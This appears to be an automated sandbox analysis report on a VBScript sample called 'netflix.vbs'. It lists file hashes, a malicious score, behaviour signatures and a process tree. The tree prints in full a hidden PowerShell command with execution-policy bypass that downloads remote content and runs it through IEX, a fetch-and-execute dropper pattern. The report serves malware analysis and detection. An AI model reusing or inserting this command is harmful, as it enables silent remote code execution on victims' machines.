Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
  • submitted
    14/10/2023, 01:05

General

  • Target

    netflix.vbs

  • Size

    1000B

  • MD5

    3e4a20fd9f6d3e595eba5ab59c868cb6

  • SHA1

    660ba0a49f0d9db61c1054c78abbce232bc8401c

  • SHA256

    70d3f1296d41d516e04e53e58f812207d5f675ebb1e9686ed4b8552cb062544b

  • SHA512

    85838fd9828c8fc91f0985c8f3e3b1a3c03425e3aba5517104dcbd96c63115545758a625b59bf2d6beaf225758e8af375fc774d6cc612ebef9a126732c200dd8

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.netflix.com/

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\netflix.vbs"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:2292
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.netflix.com/');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; runnull
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2132
      • C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe
        C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.netflix.com/');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; runnull
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1940

Network

MITRE ATT&CK Enterprise v15


Downloads

  • memory/1940-3-0x00000000738A0000-0x0000000073E4B000-memory.dmp

    Filesize

    5.7MB

  • memory/1940-4-0x00000000738A0000-0x0000000073E4B000-memory.dmp

    Filesize

    5.7MB

  • memory/1940-5-0x0000000002620000-0x0000000002660000-memory.dmp

    Filesize

    256KB

  • memory/1940-6-0x0000000002620000-0x0000000002660000-memory.dmp

    Filesize

    256KB

  • memory/1940-7-0x00000000738A0000-0x0000000073E4B000-memory.dmp

    Filesize

    5.7MB

  • memory/1940-8-0x00000000738A0000-0x0000000073E4B000-memory.dmp

    Filesize

    5.7MB